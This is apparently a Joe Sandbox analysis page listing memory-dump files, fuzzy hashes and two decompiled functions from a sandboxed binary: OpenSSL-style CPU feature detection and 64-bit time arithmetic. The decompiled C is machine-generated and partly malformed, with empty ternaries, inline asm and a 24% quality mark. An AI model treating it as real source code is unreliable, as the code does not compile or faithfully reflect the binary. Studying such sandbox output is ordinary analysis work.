Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: f49458e3d298331243722f51c7f986c6add51119df56cdc652fb6bc671e5dd01
Instruction ID: 0ab9f730826145d040c14cf97f2915456d6d049d2a46f810433f39a6bbf87d44
Opcode Fuzzy Hash: f49458e3d298331243722f51c7f986c6add51119df56cdc652fb6bc671e5dd01
Instruction Fuzzy Hash: CFF0A070208248E7F7140BD8DD09FEF321ED781711F20C021BA1967A80C6B4ECC147A9

Uniqueness

Uniqueness Score: -1.00%

Function 0007B0C0 Relevance: 1.7, APIs: 1, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_header.LIBCMT ref: 0007B450

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Init_thread_header
String ID:
API String ID: 3738618077-0
Opcode ID: cc8da92b8a1fbc8168b9ac8dea5c2595fab98011f90b06eab5ca4e804a606e95
Instruction ID: 8c61517db12ae9f50219a5fbb80d87479d0f49782682d0e51f3bd7b54b48c832
Opcode Fuzzy Hash: cc8da92b8a1fbc8168b9ac8dea5c2595fab98011f90b06eab5ca4e804a606e95
Instruction Fuzzy Hash: 2381BFB0900B15AFC320DF54EE8AB5ABBF2FB44314F014519E4196B7E2CBF459A5CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0007B000 Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_header.LIBCMT ref: 0007B063

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Init_thread_header
String ID:
API String ID: 3738618077-0
Opcode ID: 120eb77f9735f31ff19b7f4daba700af7360009a9a0a14db998742b7635dd1aa
Instruction ID: 763bf1e86833d49d69e0011700299a65bc7c8fe4cd95ff263bf63703eabc404b
Opcode Fuzzy Hash: 120eb77f9735f31ff19b7f4daba700af7360009a9a0a14db998742b7635dd1aa
Instruction Fuzzy Hash: 3111A5B1D00654CFD720DF58D846B9A77F0FB44720F04827AE9195B782D7796C60CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00073268 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInstallDetailsPayload.MSEDGE_ELF(?,000726EE), ref: 0007326B

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: DetailsInstallPayload
String ID:
API String ID: 3030567736-0
Opcode ID: 4312930b9d73828bb1bf8f7995fe33bbe474eb4a8b462072c54a7ffae3d27233
Instruction ID: 28bb91164f8bc8507f38872b33609f5634847adbfabe28b4ac695a3093a76a68
Opcode Fuzzy Hash: 4312930b9d73828bb1bf8f7995fe33bbe474eb4a8b462072c54a7ffae3d27233
Instruction Fuzzy Hash: 31B012F3C0920C47884037E63C4A486761C0A001247440021B60E45503ED15B2944193

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000CC6A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 24%

			E000CC6A0(signed int __edx, void* __edi) {
				signed int _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __ebx;
				void* __esi;
				void* _t49;
				signed int _t51;
				signed char _t54;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t73;
				signed int _t77;
				signed int _t82;
				signed int _t85;
				signed int _t101;
				signed int _t104;
				signed int _t109;
				void* _t111;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				void* _t125;
				void* _t126;
				void* _t127;
				signed int _t129;
				void* _t131;

				_t101 = __edx;
				_pop(_t121);
				_push(_t62);
				_push(__edi);
				_t126 = _t125 - 0xc;
				asm("cpuid");
				if(_t62 != 0x756e6547 || __edx != 0x49656e69) {
					_t62 = _t62 ^ 0x68747541;
					_t101 = _t101 ^ 0x69746e65 | _t62;
					_t6 = __eflags == 0;
					__eflags = _t6;
					_v24 = (0x444d4163 | _t101) & 0xffffff00 | _t6;
					_v28 = 0;
				} else {
					_v28 = 0xbadbad;
					_v24 = 0;
				}
				_t73 = 0;
				_t109 = 0;
				if(0 >= 7) {
					_t73 = 0;
					asm("cpuid");
					_t109 = _t62;
				}
				_v32 = _t73;
				asm("cpuid");
				_t63 = 0;
				_t113 = _t101;
				if(_v24 != 0 && (0xb00 != 0 || 0xad < 8 || 0xad == 8 && 1 >= 0x70 && 0xad <= 0x7f)) {
					_t63 = _t63 & 0xbfffffff;
				}
				_t114 = _t113 & 0xafefffff;
				if(_v28 == 0) {
					_t115 = _t114 | 0x10000000;
					__eflags = _t115;
				} else {
					_t115 = _t114 | 0x50000000;
					if(0 == 0x80650 || 0 == 0x50670) {
						_t63 = _t63 & 0xfbffffff;
					}
				}
				if((_t63 & 0x08000000) == 0) {
					L22:
					_t64 = _t63 & 0xefffe7ff;
					_t109 = _t109 & 0x3fdeffdf;
					__eflags = _t109;
				} else {
					asm("xgetbv");
					if(4 != 0) {
						goto L22;
					} else {
						_t64 = _t63 & 0xfffff7ff;
					}
				}
				_t77 =  ==  ? _t109 : _t109 & 0xfffeffff;
				_t47 =  !=  ? _t77 : _t77 & 0xfff7ffff;
				 *0x1360fc = _t115;
				 *0x136100 = _t64;
				 *0x136104 =  !=  ? _t77 : _t77 & 0xfff7ffff;
				 *0x136108 = _v32;
				_t49 = E000ED014(_t64, _t109, _t115, _t64 & 0x04000000, "OPENSSL_ia32cap");
				_t127 = _t126 + 4;
				if(_t49 == 0) {
					L26:
					return _t49;
				} else {
					L27();
					_t49 = E000E1300(_t49, 0x3a);
					_t127 = _t127 + 8;
					if(_t49 == 0) {
						goto L26;
					} else {
						_t104 = _t49 + 1;
						_t129 = _t127 + 0xc;
						_pop(_t118);
						_pop(_t111);
						_pop(_t66);
						_pop(_t123);
						_t124 = _t129;
						_t131 = (_t129 & 0xfffffff8) - 0x10;
						_t51 =  *0x120014; // 0xf049169a
						_v16 = _t51 ^ _t129;
						_t67 =  *_t104 & 0x000000ff;
						_t54 = 0 | _t67 == 0x0000007e;
						_t82 = (0x136100 | _t67 == 0x0000007c | _t54) & 0x000000ff;
						if( *((char*)(_t104 + _t82)) != 0x30) {
							_v24 = 0xffffffff;
							_v28 = 0xffffffff;
							goto L31;
						} else {
							_v24 = 0xffffffff;
							_v28 = 0xffffffff;
							if( *((char*)(_t82 + _t104 + 1)) != 0x78) {
								L31:
								_t104 = _t104 + _t54;
								__eflags = _t104;
								_push(_t131);
								_push("%llu");
								_push(_t104);
							} else {
								_push(_t131);
								_push("%llx");
								_push(_t54 + _t104 + 2);
							}
						}
						if(L00089C53(_t104) != 0) {
							_t85 = _v28;
							_t56 = _v24;
							if(_t67 != 0x7e) {
								__eflags = _t67 - 0x7c;
								if(_t67 != 0x7c) {
									 *0x136104 = _t85;
									 *0x00136108 = _t56;
								} else {
									 *0x136104 =  *0x136104 | _t85;
									 *0x00136108 =  *0x00136108 | _t56;
								}
							} else {
								 *0x136104 =  *0x136104 &  !_t85;
								 *0x00136108 =  *0x00136108 & _t56;
							}
						}
						return E000DE643(_t56, _t67, _v16 ^ _t124, _t104, _t111, 0x136104);
					}
				}
			}

0x000cc6a0
0x000cc6a3
0x000dc1e3
0x000dc1e4
0x000dc1e6
0x000dc1ed
0x000dc1f5
0x000dc214
0x000dc220
0x000dc22a
0x000dc22a
0x000dc22d
0x000dc230
0x000dc1ff
0x000dc208
0x000dc20b
0x000dc20b
0x000dc237
0x000dc239
0x000dc241
0x000dc248
0x000dc24a
0x000dc24c
0x000dc24c
0x000dc24e
0x000dc258
0x000dc25a
0x000dc25c
0x000dc262
0x000dc29e
0x000dc29e
0x000dc2a4
0x000dc2ae
0x000dc2d1
0x000dc2d1
0x000dc2b0
0x000dc2b0
0x000dc2c0
0x000dc2c9
0x000dc2c9
0x000dc2c0
0x000dc2df
0x000dc2f7
0x000dc2f7
0x000dc2fd
0x000dc2fd
0x000dc2e1
0x000dc2e3
0x000dc2ed
0x00000000
0x000dc2ef
0x000dc2ef
0x000dc2ef
0x000dc2ed
0x000dc30f
0x000dc31f
0x000dc322
0x000dc328
0x000dc32e
0x000dc336
0x000dc340
0x000dc345
0x000dc34a
0x000dc37d
0x000dc384
0x000dc34c
0x000dc355
0x000dc35d
0x000dc362
0x000dc367
0x00000000
0x000dc369
0x000dc36f
0x000dc371
0x000dc374
0x000dc375
0x000dc376
0x000dc377
0x000dc391
0x000dc398
0x000dc39d
0x000dc3a4
0x000dc3a8
0x000dc3b0
0x000dc3bb
0x000dc3c2
0x000dc3ea
0x000dc3f2
0x00000000
0x000dc3c4
0x000dc3c9
0x000dc3d1
0x000dc3d8
0x000dc3f9
0x000dc3f9
0x000dc3f9
0x000dc3fd
0x000dc3fe
0x000dc403
0x000dc3da
0x000dc3e1
0x000dc3e2
0x000dc3e7
0x000dc3e7
0x000dc3d8
0x000dc40e
0x000dc410
0x000dc413
0x000dc41a
0x000dc427
0x000dc42a
0x000dc433
0x000dc435
0x000dc42c
0x000dc42c
0x000dc42e
0x000dc42e
0x000dc41c
0x000dc41e
0x000dc422
0x000dc422
0x000dc41a
0x000dc449
0x000dc449
0x000dc367

APIs

___from_strstr_to_strchr.LIBCMT ref: 000DC35D

Strings

ineI, xrefs: 000DC1F7
Genu, xrefs: 000DC1EF
ntel, xrefs: 000DC1FF
OPENSSL_ia32cap, xrefs: 000DC33B

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ___from_strstr_to_strchr
String ID: Genu$OPENSSL_ia32cap$ineI$ntel
API String ID: 601868998-3767422159
Opcode ID: 870251c80db72a2dee41d7989f67287f13b6f05e6d2eb3da63354ecdf2be2b4a
Instruction ID: d6d3d4c3aad69655834055f84813a0a5832c19ec8950c4e2280d2ff5c63e2766
Opcode Fuzzy Hash: 870251c80db72a2dee41d7989f67287f13b6f05e6d2eb3da63354ecdf2be2b4a
Instruction Fuzzy Hash: B34115B2F0430706FFAC85B8AC56BBE66C1AB95320F28813FE916D63C1D9348940C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00076214 Relevance: 8.1, APIs: 5, Instructions: 556
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00076214(char _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a40) {
				void* _v16;
				signed int _v24;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed char _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v137;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				signed int _v156;
				signed int _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t204;
				signed int _t207;
				signed char _t210;
				signed int _t219;
				signed int _t220;
				signed int _t226;
				signed int _t227;
				signed int _t229;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed int _t240;
				signed int _t251;
				signed int _t252;
				signed int* _t253;
				signed int _t277;
				signed int _t278;
				signed int _t292;
				signed int _t309;
				signed int _t319;
				signed int _t324;
				signed int* _t328;
				signed int _t343;
				signed int _t353;
				signed int _t354;
				signed int _t367;
				signed int _t368;
				signed int _t377;
				signed int _t379;
				signed int _t380;
				signed int _t384;
				signed int _t388;
				signed int _t393;
				signed int _t405;
				signed int _t407;
				signed char _t412;
				signed int _t418;
				signed int _t426;
				signed int _t437;
				signed int _t439;
				signed int* _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t455;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t483;

				_t204 =  *0x120014; // 0xf049169a
				_v24 = _t204 ^ _t483;
				_t309 = _a8;
				_t462 = _a12;
				_t384 = _a16;
				_v128 = _a20;
				_t343 = _a24;
				_t207 = _a28;
				_t437 = _a32;
				_v144 = _t384;
				_v136 = _t343;
				_v132 = _t207;
				if(_t384 == 0xffffffff || _t437 == 0xffffffff) {
					L26:
					__eflags = _t309 | _t462;
					if((_t309 | _t462) == 0) {
						_t210 = 0;
						__eflags = 0;
						goto L29;
					}
					goto L27;
				} else {
					if((_t343 | _t207) != 0 || _t437 != 4) {
						_t377 = _v136;
						_t384 = _t437;
						__eflags = _t377 | _t207;
						_t437 = _t384;
						if((_t377 | _t207) != 0) {
							L10:
							__eflags = _t377 | _v132;
							if((_t377 | _v132) != 0) {
								L14:
								__eflags = _t377 | _v132;
								if((_t377 | _v132) != 0) {
									L21:
									__eflags = _t377 - 1;
									_t384 = _v132;
									asm("sbb eax, 0x0");
									if(_t377 < 1) {
										goto L26;
									}
									__eflags = _t437;
									if(_t437 != 0) {
										goto L26;
									} else {
										_t277 = _t384;
										__eflags = _t462;
										if(_t462 < 0) {
											__eflags = _v144;
											_t418 =  ~(0 | _v144 != 0x00000000);
											asm("sbb edx, esi");
											_v124 = _t418;
											_t278 = L00103E20(_t418 - _t309, _t418, _t377, _t277);
											_t462 = 0;
											asm("sbb ecx, edx");
											__eflags = _v160;
											_t437 =  ==  ?  ~_t278 :  !_t278;
											_t420 =  ==  ? 0 :  !_t418;
											_v144 =  ==  ? 0 :  !_t418;
											_t309 =  ~(E000F8380(_t418 - _t309, _v140, _v152, _v148));
											asm("sbb esi, edx");
											_t386 = _v160;
											_t379 = _a40;
										} else {
											_t455 = _t277;
											__eflags = _t377 ^ 0x00000001 | _t455;
											if((_t377 ^ 0x00000001 | _t455) != 0) {
												_v140 = E000F8380(_t309, _t462, _t377, _t455);
												_v144 = _t384;
												_t437 = L00103E20(_t309, _t462, _v152, _t455);
												_t379 = _a40;
												_t309 = _v156;
												_t462 = _v160;
											} else {
												_t386 = 0;
												_t379 = _a40;
												_t437 = 0;
											}
										}
										goto L20;
									}
								}
								__eflags = _t437 - 0x3d0900;
								if(_t437 != 0x3d0900) {
									goto L21;
								}
								__eflags = 0xa5a64af6 - _t309;
								asm("sbb eax, esi");
								if(0xa5a64af6 < _t309) {
									goto L27;
								} else {
									_t380 = _v144;
									_t462 = _t462 * 0x3e8;
									_t309 = 0x431bde83 + _t309 * 0x3e8;
									asm("adc esi, edi");
									_t292 = (_t380 * 0x431bde83 >> 0x20 >> 0x14) * 0x3d0900;
									__eflags = _t292;
									L18:
									_t379 = _a40;
									_t426 = _t380 - _t292;
									__eflags = _t426;
									_v144 = _t426;
									goto L19;
								}
							}
							__eflags = _t437 - 0xfa0;
							if(_t437 != 0xfa0) {
								goto L14;
							}
							__eflags = 0x7bd04b55 - _t309;
							asm("sbb eax, esi");
							if(0x7bd04b55 < _t309) {
								goto L27;
							} else {
								_t380 = _v144;
								_t462 = _t462 * 0xf4240;
								_t309 = 0x10624dd3 + _t309 * 0xf4240;
								asm("adc esi, edi");
								_t292 = (_t380 * 0x10624dd3 >> 0x20 >> 8) * 0xfa0;
								goto L18;
							}
						}
						__eflags = _t437 - 0x190;
						if(_t437 != 0x190) {
							goto L10;
						}
						__eflags = 0xbf94d454 - _t309;
						asm("sbb eax, esi");
						if(0xbf94d454 < _t309) {
							goto L27;
						} else {
							_t380 = _v144;
							_t462 = _t462 * 0x989680;
							_t309 = 0x51eb851f + _t309 * 0x989680;
							asm("adc esi, edi");
							_t292 = (_t380 * 0x51eb851f >> 0x20 >> 7) * 0x190;
							goto L18;
						}
					} else {
						_t384 = _t462 >> 8;
						asm("sbb eax, edx");
						if(0x225c17c < (_t462 << 0x00000020 | _t309) << 0x18) {
							L27:
							_t210 = _t462 >> 0x1f;
							L29:
							__eflags = _v132;
							_v124 = _t210;
							_t386 = (_t384 & 0xffffff00 | _v132 < 0x00000000) ^ _t210;
							__eflags = _v144 - 0xffffffff;
							if(_v144 == 0xffffffff) {
								L32:
								asm("adc esi, 0x7fffffff");
								__eflags = _v124;
								_t345 =  !=  ? 0xffffffffffffffff : 0xffffffffffffffff;
								_t437 = _a40;
								 *_t437 =  !=  ? 0xffffffffffffffff : 0xffffffffffffffff;
								_t347 =  !=  ? 0 : 0x7fffffff;
								 *((intOrPtr*)(_t437 + 4)) =  !=  ? 0 : 0x7fffffff;
								__eflags = _t386;
								_t309 =  ==  ? 0xffffffffffffffff : 0;
								 *((intOrPtr*)(_t437 + 8)) = 0xffffffff;
								_t213 = 0x7fffffff;
								_t462 =  ==  ? 0x7fffffff : 0;
								__eflags =  ==  ? 0x7fffffff : 0;
								goto L33;
							}
							__eflags = _v136 | _v132;
							if((_v136 | _v132) != 0) {
								L34:
								__eflags = _t437 - 0xffffffff;
								if(_t437 == 0xffffffff) {
									_t213 = _a40;
									 *_t213 = _t309;
									 *(_t213 + 4) = _t462;
									 *((intOrPtr*)(_t213 + 8)) = _v144;
									 *((intOrPtr*)(_t213 + 0xc)) = _v128;
									_t309 = 0;
									_t462 = 0;
									goto L33;
								}
								_v137 = _t386;
								_t219 = _t462 >> 0x1f;
								_t220 = _t219 ^ _t309;
								_t388 = _v144;
								_t353 = _t219 ^ _t462;
								__eflags = _t462;
								_t314 =  >=  ? _t388 : 0xee6b2800 - _t388;
								_v144 = _t220 * 0xee6b2800 >> 0x20;
								_v120 = _t437;
								_t465 = _t220 * 0xee6b2800 + ( >=  ? _t388 : 0xee6b2800 - _t388);
								_v128 = _t220 * 0xee6b2800 + ( >=  ? _t388 : 0xee6b2800 - _t388);
								asm("adc eax, [esp]");
								_v112 = _t353 * 0xee6b2800;
								asm("adc edx, 0x0");
								_v108 = _t353 * 0xee6b2800 >> 0x20;
								_v144 = _t462 > 0;
								_t393 = _v132;
								_t226 = _t393 >> 0x1f;
								_t227 = _t226 ^ _v136;
								_t354 = _v120;
								_t439 = _t226 ^ _t393;
								__eflags = _t393;
								_t317 =  >=  ? _t354 : 0xee6b2800 - _t354;
								_v136 = _t227 * 0xee6b2800 >> 0x20;
								_t229 = _t439;
								_t467 = _t227 * 0xee6b2800 + ( >=  ? _t354 : 0xee6b2800 - _t354);
								asm("adc edx, [esp+0x8]");
								asm("adc ecx, 0x0");
								asm("pcmpeqd xmm0, xmm0");
								_t440 =  &_v64;
								asm("movdqa [edi], xmm0");
								_v76 = (_t229 * 0xee6b2800 & 0xffffff00 | _t393 > 0x00000000) & 0x000000ff;
								_v72 = _t229 * 0xee6b2800 >> 0x20;
								_v136 = _t439 * 0xee6b2800;
								_v132 = _t227 * 0xee6b2800 + ( >=  ? _t354 : 0xee6b2800 - _t354);
								_v68 = _v144 & 0x000000ff;
								E00074024(_t440, _v128, _v112, _v108, _v144 & 0x000000ff, _t227 * 0xee6b2800 + ( >=  ? _t354 : 0xee6b2800 - _t354), _t439 * 0xee6b2800, _t229 * 0xee6b2800 >> 0x20, (_t229 * 0xee6b2800 & 0xffffff00 | _t393 > 0x00000000) & 0x000000ff);
								_t319 =  *_t440;
								_t468 = _t440[1];
								_t441 = _t440[2];
								__eflags = _a4;
								_v116 = _t440[3];
								if(_a4 != 0) {
									_v144 = _t319;
									__eflags = _t468;
									_t266 =  !=  ? __eflags != 0 : __eflags < 0;
									__eflags = ( !=  ? __eflags != 0 : __eflags < 0) - 1;
									_t319 = _v144;
									if(__eflags == 0) {
										asm("adc esi, ecx");
										__eflags = _v137;
										_t468 =  ==  ? 0x7fffffff : 0x7fffffff;
										_t319 =  ==  ? 0xffffffffffffffff : 0;
										_v64 = 0xffffffffffffffff;
										_v60 = 0x7fffffff;
										_v52 = 0;
										_t441 = 0;
										__eflags = 0;
										_v56 = 0;
										_v116 = 0;
									}
								}
								_t234 = _t319;
								_t442 = _v132;
								_v84 = _t234 * _t442 >> 0x20;
								_v120 = _t234 * _t442;
								_t236 = _t468;
								_v88 = _t236 * _t442 >> 0x20;
								_v144 = _t236 * _t442;
								_t238 = _t319;
								_t443 = _v136;
								_v92 = _t238 * _t443 >> 0x20;
								_v80 = _t238 * _t443;
								_t240 = _t468;
								_v96 = _t240 * _t443 >> 0x20;
								_v100 = _t240 * _t443;
								_v104 = _t319 * _v72;
								asm("adc ebx, esi");
								asm("adc ebx, [esp+0x30]");
								_v144 = _v144 + _v84;
								asm("sbb edx, 0x0");
								_t471 = _v68;
								asm("sbb esi, 0x0");
								asm("adc ecx, ebx");
								_t405 = _v108 - _v92 + _v88 + _t441 * _v132 + _v104 + _v100;
								asm("sbb esi, ecx");
								asm("sbb edx, 0x0");
								asm("sbb esi, 0x0");
								_t437 = _v128 - _v120;
								_t251 = _v112;
								_v144 = _v144 + _v80;
								asm("sbb eax, ecx");
								asm("sbb edx, 0x0");
								asm("sbb esi, 0x0");
								__eflags = _t405 | _t471;
								if((_t405 | _t471) == 0) {
									_t252 = E000F8380(_t437, _t251, 0xee6b2800, 0);
									_t324 = _t405;
									goto L44;
								} else {
									__eflags = _t405 - 0x77359400;
									asm("sbb ecx, 0x0");
									if(__eflags < 0) {
										asm("pcmpeqd xmm0, xmm0");
										_t328 =  &_v48;
										asm("movdqa [ebx], xmm0");
										__eflags = 0;
										E00074024(_t328, _t437, _t251, _t405, _t471, 0xee6b2800, 0, 0, 0);
										_t252 =  *_t328;
										_t324 = _t328[1];
										L44:
										_t407 = _t252 * 0x1194d800 + _t437;
										__eflags = _v124;
										if(_v124 == 0) {
											_t367 = _t407;
											_t472 = _t252;
										} else {
											_t367 = 0;
											_t472 =  ~_t252;
											_t437 = _t324;
											_t324 = 0;
											asm("sbb ebx, edi");
											__eflags = _t407;
											if(_t407 != 0) {
												_t437 =  !_t437;
												_t367 = 0xee6b2800 - _t407;
												_t472 =  !_t252;
												_t324 = _t437;
											}
										}
										L48:
										_t253 = _a40;
										 *_t253 = _t472;
										_t253[1] = _t324;
										_t253[2] = _t367;
										_t213 = _v64;
										_t368 = _v60;
										__eflags = _v137;
										if(_v137 == 0) {
											_t213 = _t213 & 0xffffffffffffffff;
											_t386 = 0x7fffffff;
											_t309 = _t213;
											_t462 = _t368 & 0x7fffffff;
										} else {
											_t386 = _v56 | _t213;
											_t309 = 0;
											__eflags = _v52 | _t368 | _v56 | _t213;
											_t462 = 0;
											if((_v52 | _t368 | _v56 | _t213) != 0) {
												_t386 = 0;
												_t213 =  ~_t213;
												asm("sbb edx, ecx");
												asm("adc esi, 0x0");
												_t462 = 0x7fffffff;
												_t309 = 0 | _t213;
											}
										}
										goto L33;
									}
									_t412 = _v124;
									_t367 = (((_v128 ^ _v120 | _t405 ^ 0x77359400) & 0xffffff00 | __eflags == 0x00000000) & _t412 & 0x000000ff) - 1;
									asm("adc ebx, 0x0");
									__eflags = _t412;
									_t472 =  ==  ? 0xffffffffffffffff : 0;
									_t324 =  ==  ? 0x7fffffff : 0x7fffffff;
									goto L48;
								}
							}
							__eflags = _t437;
							if(_t437 != 0) {
								goto L34;
							}
							goto L32;
						} else {
							_t462 = _t462 * 0x3b9aca00;
							_t309 = (_v144 >> 2) + _t309 * 0x3b9aca00;
							asm("adc esi, edx");
							_t379 = _a40;
							_v144 = _v144 & 0x00000003;
							L19:
							_t437 = 0;
							_t386 = 0;
							L20:
							 *_t379 = _t437;
							 *(_t379 + 4) = _t386;
							_t213 = _v144;
							 *(_t379 + 8) = _v144;
							L33:
							E000DE643(_t213, _t309, _v24 ^ _t483, _t386, _t437, _t462);
							return _t309;
						}
					}
				}
			}

0x00076223
0x0007622a
0x0007622e
0x00076231
0x00076234
0x0007623a
0x0007623e
0x00076241
0x00076244
0x00076247
0x0007624d
0x00076251
0x00076255
0x00076402
0x00076404
0x00076406
0x0007640f
0x0007640f
0x00000000
0x0007640f
0x00000000
0x00076264
0x00076266
0x000762b1
0x000762b5
0x000762bb
0x000762bd
0x000762bf
0x0007630e
0x00076310
0x00076314
0x00076360
0x00076362
0x00076366
0x000763ce
0x000763ce
0x000763d1
0x000763d7
0x000763da
0x00000000
0x00000000
0x000763dc
0x000763de
0x00000000
0x000763e0
0x000763e0
0x000763e2
0x000763e4
0x000767f9
0x00076800
0x00076806
0x00076808
0x00076812
0x00076819
0x00076822
0x00076824
0x0007682a
0x0007682f
0x00076832
0x0007684a
0x0007684c
0x0007684e
0x00076852
0x000763ea
0x000763ea
0x000763f1
0x000763f3
0x00076863
0x00076867
0x00076877
0x00076879
0x0007687c
0x00076880
0x000763f9
0x000763f9
0x000763fb
0x000763fe
0x000763fe
0x000763f3
0x00000000
0x000763e4
0x000763de
0x00076368
0x0007636e
0x00000000
0x00000000
0x00076375
0x0007637c
0x0007637e
0x00000000
0x00076384
0x0007638b
0x0007639d
0x000763a6
0x000763a8
0x000763aa
0x000763aa
0x000763b0
0x000763b2
0x000763b5
0x000763b5
0x000763b7
0x00000000
0x000763b7
0x0007637e
0x00076316
0x0007631c
0x00000000
0x00000000
0x00076323
0x0007632a
0x0007632c
0x00000000
0x00076332
0x00076339
0x0007634b
0x00076354
0x00076356
0x00076358
0x00000000
0x00076358
0x0007632c
0x000762c1
0x000762c7
0x00000000
0x00000000
0x000762ce
0x000762d5
0x000762d7
0x00000000
0x000762dd
0x000762e4
0x000762f6
0x000762ff
0x00076301
0x00076303
0x00000000
0x00076303
0x0007626d
0x00076275
0x00076284
0x00076286
0x00076408
0x0007640a
0x00076411
0x00076411
0x00076419
0x0007641d
0x0007641f
0x00076423
0x00076433
0x0007643d
0x00076443
0x0007644a
